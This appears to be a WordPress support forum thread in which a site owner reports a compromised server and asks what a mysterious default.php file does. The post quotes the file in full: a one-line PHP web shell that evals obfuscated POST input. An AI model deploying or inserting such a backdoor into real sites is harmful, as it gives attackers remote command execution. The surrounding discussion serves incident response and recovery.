Compromised - Unknown Files

In my root web directory a new files popped up recently called default.php:

<?php if($_GET["rnd"]){die($_GET["rnd"]);}elseif($_POST["e"]){eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST["e"]))))));exit;} ?>

Appears to be a compromise. Does anyone have a similar file in their root directory?

I have a few access attempts to that file:
http://www.tensosys.biz - - [03/Jan/2012:11:34:08 -0500] "POST /default.php HTTP/1.0" 200 0 "" "-"
http://www.tensosys.biz - - [03/Jan/2012:11:36:26 -0500] "POST /default.php HTTP/1.0" 200 0 "" "-"
kwan.lunarpages.com - - [03/Jan/2012:12:07:56 -0500] "POST /default.php HTTP/1.0" 200 0 "" "-"
kwan.lunarpages.com - - [03/Jan/2012:12:12:27 -0500] "POST /default.php HTTP/1.0" 200 0 "" "-"

Any ideas what the file is attempting to accomplish?

  • DavidM
    • DEV MAN’s Mascot

    Hi targetdir,

    That definitely doesn't seem good, though I imagine there's more to the default.php than that single line, correct?

    I've not heard of anything regarding a default.php file, I'll tag a few of the other guys over here to see if they're aware of anything surrounding this.

    -David

  • targetdir
    • Site Builder, Child of Zeus

    Hi,

    > I imagine there's more to the default.php than that single line, correct?

    That is the entire file.

    > A really common exploit being used right now is older versions of timthumb in your themes.

    I did a complete timthumb clean-up when the issue was announced.

    I modified default.php to save all variables to a log file whenever it is accessed. Hopefully it will give us some insight as to how it is being used. I'll keep this ticket open for now and post an update.

  • DavidM
    • DEV MAN’s Mascot

    Hiya targetdir,

    Aaron's clarified that one and I really should have caught onto that. I was thinking there'd need to be html form code to accompany it but I see what's in view now, definitely some bad stuff.

    The "open" status is more for our purposes than anything and as this thread isn't related to the plugins here it'd cause some confusion to keep it "open" as such. I'll mark this resolved for support purposes but the threads here are always open to further discussion and feedback.

    We'd also love to know how that resolution goes with this one. Definitely helps other members too, as it's always great to know how recovery from these occurrences go.

    Thanks,
    David

  • Barry
    • DEV MAN’s Mascot

    @targetdir - but whilst you are at things - I suggest replacing all your WP core files, and those of your themes as they seem to be the most targetted files for this type of attack. Then check the directories you allow uploads into, so uploads, updates and blogs.dir if you have it, and any cache directories in your themes directories.

  • targetdir
    • Site Builder, Child of Zeus

    > @targetdir - but whilst you are at things - I suggest replacing all your WP core files..

    Hi Barry, thanks for the suggestion. I use SVN to install/manage Wordpress so I was able to see which files were added or modified.

    Just to update this ticket:
    Default.php is designed to allow someone to run any server command - only limited to the rights of the user which Apache runs as. My log file captured a number of attempts to use default.php to further exploit the server, add additional files, etc.

    I guess the lesson here is to keep a close eye on your file system. SVN helps a lot in situations like this.

Thank NAME, for their help.

Let NAME know exactly why they deserved these points.

Gift a custom amount of points.